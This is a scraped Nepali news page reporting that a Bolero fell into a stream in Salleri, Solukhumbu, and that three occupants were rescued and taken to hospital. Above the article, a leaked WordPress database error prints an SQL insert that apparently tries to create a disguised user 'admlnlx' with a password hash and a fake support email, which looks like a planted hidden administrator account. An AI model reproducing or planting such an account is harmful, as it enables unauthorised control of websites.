WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqcF46RqDMwEq3r9i9f98vf0OEpSlm1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:37:03', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुमा बोलेरो दुर्घटना, ३ जनाको उद्धार – Gaule Khabar

सोलुखुम्बुमा बोलेरो दुर्घटना, ३ जनाको उद्धार

सोलुखुम्बुमा बोलेरो दुर्घटना, ३ जनाको उद्धार

काठमाण्डौ । सोलुखुम्बु जिल्लाको सल्लेरीमा बोलेरो दु’र्घटना भएको छ ।

सोलुदुधकुण्ड नगरपालिका ५ र ६ को सिमाना नजिकको सडकबाट उकालो चढ्दै गरेको बोलेरो खोल्सामा खसेको हो । घा’इते चालक सहित एक बृद्ध र एक बालिकाको उ’द्धार गरिएको छ । बोलेरोमा सवार ३ जनाको उ’द्धार गरिएसँगै घा’इतेलाई उ’पचारका लागि जिल्ला अस्पताल पठाएको छ ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका